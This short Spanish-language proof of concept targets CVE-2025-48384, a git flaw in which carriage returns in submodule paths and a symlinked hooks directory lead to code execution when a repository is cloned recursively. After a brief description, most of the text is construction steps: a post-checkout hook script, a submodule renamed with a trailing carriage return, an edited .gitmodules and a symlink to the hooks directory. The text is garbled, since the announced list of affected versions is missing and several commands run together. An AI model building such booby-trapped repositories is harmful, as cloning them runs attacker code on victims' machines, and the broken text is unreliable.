
PoC para CVE-2025-48384
CVE-2025-48384 se presenta como una vulnerabilidad de resolución de enlace incorrecta (seguimiento de enlaces) en git. Específicamente, los nombres de archivo con retornos de carro se analizan incorrectamente en .git/config, e incluir un enlace simbólico para apuntar a un ejecutable de hook de git ubicado en un submódulo como el directorio de hooks del submódulo puede llevar a la ejecución arbitraria de código cuando el repositorio se clona con git clone --recursive.
Git para Microsoft Windows no se ve afectado por esta vulnerabilidad, dejando principalmente vulnerables versiones específicas de git en Linux y MacOS. Las versiones afectadas son:
post-checkout para ejecutar código cuando el repositorio poc se clone de forma recursiva:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git subgit mv sub $(printf "sub\r")printf "\tpath = \"sub\r\"\n" en .gitmodules y elimina la ruta original.ln -s .git/modules/sub/hooks sub